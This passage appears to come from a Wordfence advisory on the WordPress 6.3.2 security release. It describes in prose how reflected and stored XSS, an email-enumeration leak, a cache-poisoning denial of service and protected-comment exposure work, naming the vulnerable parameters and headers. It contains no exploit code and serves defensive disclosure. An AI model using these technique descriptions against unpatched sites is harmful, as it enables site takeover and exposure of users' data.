Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Reflected Cross-Site Scripting via the ‘success_url’ and ‘reject_url’ parameters when requesting application passwords in versions between 5.6 and 6.3.1 due to insufficient input sanitization and output escaping of pseudo protocol URIs. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link and accepting or rejecting the application password. WordPress allows applications to request application passwords to be generated for them. WordPress before 6.3.2 fails to validate the redirect URIs used when a password is authorized or rejected, which means that an attacker could generate a URL for an application password request containing data: and javascript: pseduo protocol redirects. If the victim visits this URL on their site and approves or rejects the application password request, they could be redirected to a URI that executes JavaScript on their browser. WordPress 6.3.2 contains a patch for this issue. As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors. All Wordfence users, including Wordfence free, Wordfence Premium, Wordfence Care, and Wordfence Response users are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection. Additionally, Wordfence disables application passwords by default. Comment Visibility Description: WordPress Core <= 6.3.1 – Authenticated(Contributor+) Sensitive Information Exposure via Comments on Protected Posts Affected Versions: WordPress Core < 6.3.2 Researcher: JB Audras(WordPress Security Team) & Rafie Muhammad(Patchstack) CVE ID: Pending CVSS Score: 4.3(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Sensitive Information Exposure in versions up to, and including, 6.3.1 via the comments listing. This allows authenticated users, with contributor-level privileges or above, to view comments on protected posts. Prior to WordPress 6.3.2, it was possible for users to view comments on posts even when they did not have access to those posts. While this is in most cases a relatively low-impact issue, WordPress 6.3.2 contains a patch protecting the privacy of comments on private or protected posts. Removing POP Chains While WordPress Core has not had a known Object Injection vulnerability for some time, Object Injection vulnerabilities in various plugins and themes are regularly discovered by researchers, including Wordfence’s own in-house Threat Intelligence team. All Object Injection vulnerabilities require POP chains in order to be successful. Prior to WordPress 6.3.2, potential POP chains were present in the WP_Theme, WP_Block_Type_Registry, WP_Block_Patterns_Registry, Requests/Session, Request/Iri, and Requests/Hooks classes. While we were unable to develop a functioning exploit for these in the time available, the patches involved indicate that they are designed to prevent unexpected Object Unserialization that could lead to Remote Code Execution. Credit to Marc Montpas of Automattic for discovering the vulnerable POP chains. The Wordfence Threat Intelligence Team will continue reverse engineering this patch to determine if a firewall rule will be necessary, but at this time it has not received an official vulnerability entry because it is not technically a vulnerability on its own. No More Searching By Email Description: WordPress Core 4.7.0-6.3.1 – Sensitive Information Exposure via User Search REST Endpoint Affected Versions: WordPress Core < 6.3.2 Researcher: Marc Montpas(Automattic) CVE ID: Pending CVSS Score: 5.3(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the ‘list_users’ capability, the search is applied to the user_email column. This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site. While WordPress prior to 6.3.2 did not directly display user email addresses to users without the “list_users” capability, it still searched the user email column in wp_users. This meant that it was possible to brute-force search or verify the email address of any user with a published post or page by including the partial email address in the search parameter, potentially impacting user privacy. The patch for this limits the search columns for users without the “list_users” capability to only the columns displayed. Cache Poisoning Denial of Service Description: WordPress Core 4.7.0-6.3.1 – Denial of Service via Cache Poisoning Affected Versions: WordPress Core < 6.3.2 Researcher: s5s & raouf_maklouf CVE ID: Pending CVSS Score: 5.3(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in denial of service. Responses to REST API requests are not cached for logged-in users, but WordPress Core before 6.3.2 had an edge case where, in heavily cached configurations, an unauthenticated attacker could send a request to the REST API using the X-HTTP-Method-Override header to a public endpoint and receive a 4xx error, either because the endpoint restricts access to those methods or does not support them at all. In cases where the error is cached, any other unauthenticated visitors attempting to retrieve data from that endpoint would see the cached 4xx error. Contributor+ Stored Cross-Site Scripting in Footnotes Description: WordPress Core 6.3-6.3.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Footnotes Block Affected Versions: WordPress Core < 6.3.2 Researcher: Jorge Costa(WordPress Core Team) CVE ID: Pending CVSS Score: 6.4(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Stored Cross-Site Scripting via the footnotes block in versions between 6.3 and 6.3.1 due to insufficient input sanitization and output escaping on the footnotes block. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress prior to 6.3.2 did not adequately sanitize the content of footnote blocks, allowing authenticated users, with Contributor-level privileges or above, to insert JavaScript that would execute when a page containing the footnotes was visited. While input is partially escaped on the client-side, it is possible to intercept a request and add unescaped script tags to the footnote metadata. WordPress has released a patch for this vulnerability in 6.3.2. As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors. We have released a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response users against this vulnerability, and free Wordfence users will receive the same protection in 30 days, on November 11th, 2023. Contributor+ Stored Cross-Site Scripting in Navigation Links Description: WordPress Core 5.9-6.3.1 – Authenticated(Contributor+) Stored Cross-Site Scripting via navigation attributes Affected Versions: WordPress Core 5.9-6.3.1 Researcher: Rafie Muhammad & Edouard L of Patchstack CVE ID: Pending CVSS Score: 6.4(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to Stored Cross-Site Scripting via the arrow navigation block attributes in versions between 5.9 and 6.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level privileges and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress Core’s Block Editor includes a navigation block that includes arrows or chevrons to display previous and next posts. WordPress before 6.3.2 failed to adequately check or sanitize the attribute defining whether to use an arrow or a chevron. As a result, any user with access to the post editor could insert malicious JavaScript into the arrow navigation element, which would be executed whenever a visitor accessed that page. As with all Cross-Site Scripting vulnerabilities, this can be used to take over a site by creating malicious administrators and backdoors. We were unable to successfully exploit this vulnerability at the time of publication, but will update this post if we are able to achieve a proof of concept, along with a firewall rule if needed to protect our users. Conclusion WordPress 6.3.2 includes patches for 5 Medium-Severity vulnerabilities as well as hardening against separate Object Injection vulnerabilities found in third-party plugins and themes. Several of these vulnerabilities are trivial to exploit and we recommend updating immediately if your site has not yet automatically done so. We have released firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers against the most impactful vulnerabilities and these rules will be available to free Wordfence users in 30 days, on November 11th, 2023. If you know someone who uses WordPress and isn’t keeping it automatically updated, we recommend sharing this advisory with them to ensure their site remains secure, as several of these vulnerabilities pose a significant risk. For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard. Special thanks to the security researchers who responsibly disclosed these vulnerabilities, as well as to Threat Intelligence Lead Chloe Chamberland for her assistance with this article and for writing the firewall rules to protect Wordfence customers. </code></pre>